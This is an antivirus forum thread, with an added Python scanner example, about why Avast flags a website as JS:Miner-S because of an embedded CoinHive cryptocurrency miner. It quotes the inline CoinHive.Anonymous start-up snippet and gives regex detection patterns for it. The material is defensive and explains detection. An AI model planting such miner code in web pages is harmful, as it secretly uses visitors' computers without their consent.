Author Topic: JS:Miner-S  (Read 2841 times)


Offline TheOwner

  • Sr. Member
  • ****
  • Posts: 222
JS:Miner-S
« on: April 16, 2018, 05:26:01 PM »
Hello,
Avast blocks one site and marks it as JS:Miner-S. Although I know there is a coinhive miner on that site, I use uBlock Origin to block it. So why does Avast detect it? Is it some new version that uBlock does not block?
Before that it was Miner C, now it is S. What is the difference?
Thank you.

Offline LukasJ

  • Avast team
  • Jr. Member
  • *
  • Posts: 60
Re: JS:Miner-S
« Reply #1 on: April 16, 2018, 05:30:31 PM »
Hi,
Yes, detection JS:Miner-S blocks new coinhive scripts.

Lukas

Offline Pondus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34655
Re: JS:Miner-S
« Reply #2 on: April 16, 2018, 05:51:46 PM »
Quote
Avast blocks one site and marks it as JS:Miner-S. Although I know there is a coinhive miner on that site, I use uBlock Origin to block it. So why does Avast detect it? Is it some new version that uBlock does not block?
Maybe, or the Avast Web Shield reads the HTML code before uBlock does.


Quote
Before that it was Miner C, now it is S. What is the difference?
Just like cars, there are many variations and they don't all come from the same factory   ;)

https://www.fortinet.com/blog/threat-research/the-growing-trend-of-coin-miner-javascript-infection.html


Chief Wiggum: Uh, no, you got the wrong number. This is 9-1…2.


Offline TheOwner

  • Sr. Member
  • ****
  • Posts: 222
Re: JS:Miner-S
« Reply #3 on: April 16, 2018, 06:07:07 PM »
So I found that Avast detects the miner when I visit that site and tells me a miner was found. The strange thing is that when I look at what was blocked, it did not block a single JavaScript file; it blocked the URL of that page, not a file.
Also, the coinhive script is blocked by uBlock Origin; if I disable it, Avast detects Miner C.
So I don't understand what version S means. It does not block any single file. It seems Avast is trying to block known mining sites, but that site works even though Avast tried to block it.

https://urlquery.net/report/1fef71de-7294-4882-b5d0-5af3dda68faa
« Last Edit: April 16, 2018, 07:16:14 PM by TheOwner »

Offline Pondus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34655
Re: JS:Miner-S
« Reply #4 on: April 16, 2018, 06:09:56 PM »
They may also add a URL block ... double protection.

What URL is it? Post it non-clickable.



Offline Pondus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34655
« Last Edit: April 16, 2018, 08:04:55 PM by Pondus »


Offline TheOwner

  • Sr. Member
  • ****
  • Posts: 222
Re: JS:Miner-S
« Reply #6 on: April 16, 2018, 08:07:41 PM »
Sample.txt? I still don't understand what triggers this popup.

Offline Pondus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34655
Re: JS:Miner-S
« Reply #7 on: April 16, 2018, 08:12:16 PM »
Quote
Sample.txt? I still don't understand what triggers this popup.
The website is infected with a miner script ... what is strange?

Post a screenshot of the popup.



Offline TheOwner

  • Sr. Member
  • ****
  • Posts: 222
Re: JS:Miner-S
« Reply #8 on: April 16, 2018, 08:14:20 PM »
I know that! coinhive.com/lib/coinhive.min.js is Miner C. But where did you find the S version? In which file?

Offline Pondus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34655
Re: JS:Miner-S
« Reply #9 on: April 16, 2018, 08:16:24 PM »
Quote
I know that! coinhive.com/lib/coinhive.min.js is Miner C. But where did you find the S version? In which file?
primeassteens.com >> HTML code



Offline TheOwner

  • Sr. Member
  • ****
  • Posts: 222
Re: JS:Miner-S
« Reply #10 on: April 16, 2018, 08:24:20 PM »
OK, I removed coinhive.com/lib/coinhive.min.js from that HTML code, tried VirusTotal again and now it is clean. So it is just two detections of that same file.

Offline Pondus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 34655
Re: JS:Miner-S
« Reply #11 on: April 16, 2018, 08:43:46 PM »
The .js file at that location changes; you can find many previous versions (different MD5) by searching VT.



Offline TheOwner

  • Sr. Member
  • ****
  • Posts: 222
Re: JS:Miner-S
« Reply #12 on: April 17, 2018, 03:43:07 PM »
Yes, it is possible, but if I go to that site without uBlock, Avast reports 2 detections: one C version that marks the .js file and an S version that marks the HTML code. But when I block that .js file with uBlock, Avast still reports the S version to me, even though that miner cannot work without that .js.

I found that the S version is triggered by this script:
(script)
   var miner = new C o i n H i v e. A n  o n y m o u s('XXXXXXXXXXXXXXXXXXXXXXXXX', {
   // threads: X,
   throttle: X,
});
   miner.start();
(/script)
« Last Edit: April 17, 2018, 04:18:03 PM by TheOwner »
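
Added example, not part of the original thread and not Avast's actual signature logic: a small static scanner showing why a page can still be flagged on its inline `CoinHive.Anonymous` start-up code after a browser extension has blocked the external `coinhive.min.js`. The sample page, the placeholder site key, the finding names and the `blocked_srcs` parameter are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# Constructed sample page: external loader plus inline start-up code,
# with a placeholder site key (not a real one).
SAMPLE_HTML = """<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
   var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', {
   throttle: 0.5,
});
   miner.start();
</script>
</head><body>page</body></html>"""

# Reference to the library file named in the thread.
LOADER_RE = re.compile(r"coinhive\.com/lib/coinhive\.min\.js", re.I)
# Inline constructor call; whitespace between tokens is tolerated.
INLINE_RE = re.compile(r"new\s+CoinHive\s*\.\s*Anonymous\s*\(", re.I)


class ScriptCollector(HTMLParser):
    """Collects <script src=...> URLs and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append(data)


def scan(html, blocked_srcs=()):
    """Return a set of findings; blocked_srcs models a client-side blocker."""
    c = ScriptCollector()
    c.feed(html)
    c.close()
    findings = set()
    if any(LOADER_RE.search(s) for s in c.srcs if s not in blocked_srcs):
        findings.add("external-loader")
    if any(INLINE_RE.search(body) for body in c.inline):
        findings.add("inline-start")
    return findings
```

Blocking the external file removes only the `external-loader` finding; the inline block is still present in the HTML that a scanner in front of the browser sees.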

Offline TheOwner

  • Sr. Member
  • ****
  • Posts: 222
Re: JS:Miner-S
« Reply #13 on: April 20, 2018, 07:43:46 PM »
Today I no longer see the JS:Miner-S detection on that site, although that code is still present. I saved the HTML code to a .txt file and sent it to VirusTotal, and also right-clicked that file -> scan by Avast. Both detect JS:Miner-S, but the Web Shield does not. When I copied that code here, Avast detected it too. Does that mean this code is whitelisted on that site?
« Last Edit: April 20, 2018, 07:57:33 PM by TheOwner »

Offline jefferson sant

  • Ultra Poster
  • *****
  • Posts: 5360
  • volunteer
Re: JS:Miner-S
« Reply #14 on: April 23, 2018, 02:01:50 AM »
Hello.

Script is contaminated by all links from primeassteens, not only homepage.

https://www.virustotal.com/#/file/b1a6d6d809bb0ed2c98c286cbc8b36fa0366b2a051cbb384e179685415dbea51/detection

Avast detected JS:Miner-S and blocked it all; if it were not for this, the address would connect to the coinhive server as authedmine, unnoticed by the user, and download, i.e., 2 variants.

worker-asmjs.min.js

https://www.virustotal.com/#/file/ee374ae08f22d91a92cfcf6b9d8b4cccfd0d57016e9d8fd3af9fbdbd36781b38/detection

coinhive.min[1].js

https://www.virustotal.com/#/file/5d514880ad502302dd4bf0ef8da5d38356385d1c43689f6739f6771ed7a4ef73/detection

JS Miner-C contained the known cryptojacking code that was used; it was modified with a new variant on the coinhive site, and it is detected as BV:Miner-T [Trj], new CryptoNight algorithm.